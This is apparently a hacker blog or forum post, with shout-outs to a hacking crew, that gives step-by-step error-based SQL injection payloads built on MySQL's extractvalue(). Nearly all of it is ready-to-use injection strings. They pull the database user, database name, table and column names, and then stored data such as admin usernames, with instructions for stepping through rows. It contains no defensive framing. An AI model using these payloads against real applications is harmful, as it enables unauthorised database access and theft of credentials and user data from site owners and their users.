Pranaam to all bhai ji _/\_
Today i am going to share XPath injection payloads for SQL injection exploitation.
we will use extractvalue() of SQL which is XML function.
so lets start...
First of all, necessary condition is, vulnerable application should display MySQL server error in case query is wrong.
means, when you add ' , " or \ in parameter, application should display MySQL error.
Payload for extracting SQL user
======================
and extractvalue(6678,concat(0x7e,(select user() ),0x7e ))-- -
Payload for extracting database name
=========================
and extractvalue(6678,concat(0x7e,(select database() ),0x7e ))-- -
Payload for extracting Table name
=======================
Below payload will extract first table name from current table name
and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
for extraction of next table name , change value of limit clause from 0,1 to 1,1
like this
and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e ))-- -
Payload for extracting Column name
========================
Below payload will extract first column name from specified table name
and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_name=0xhex_value_of_table_name LIMIT 0,1),0x7e))-- -
here we need to replace 'hex_value_of_table_name' with hex value of the table name from which we want to extract column name
like table name is admin and its hex value is 61646d696e
payload will be like this
and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_name=0x61646d696e LIMIT 0,1),0x7e))-- -
for extraction of next column name , just change value of limit clause from 0,1 to 1,1
Payload for extracting data
==================
Below payload extracts data from specified column of specified table
and extractvalue(6678,concat(0x7e,(select column_name from table_name LIMIT 0,1),0x7e))-- -
you just need to replace column_name with name of the column (like there is column having name username in table having name admin)
replace table_name with name of the table (like there is table having name admin)
so payload will be like this
and extractvalue(6678,concat(0x7e,(select username from admin LIMIT 0,1),0x7e))-- -
above payload will extract first value from specified column and for extraction of next value, just change value of limit from 0,1 to 1,1 and so on :)
-==[[Love to]]==--
zero Cool ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba ,Silent poison India,Magnum sniper,Atul Dwivedi,ethicalnoob Indishell,Local root indishell,Irfninja indishell,Reborn India,L0rd Crus4d3r,AR AR,Hackuin,Mannu, ViKi, Hardeep singh, Bhuppi,Mohit, Ffe, RR Mam, Jagriti, DON and bikash dash
0 comments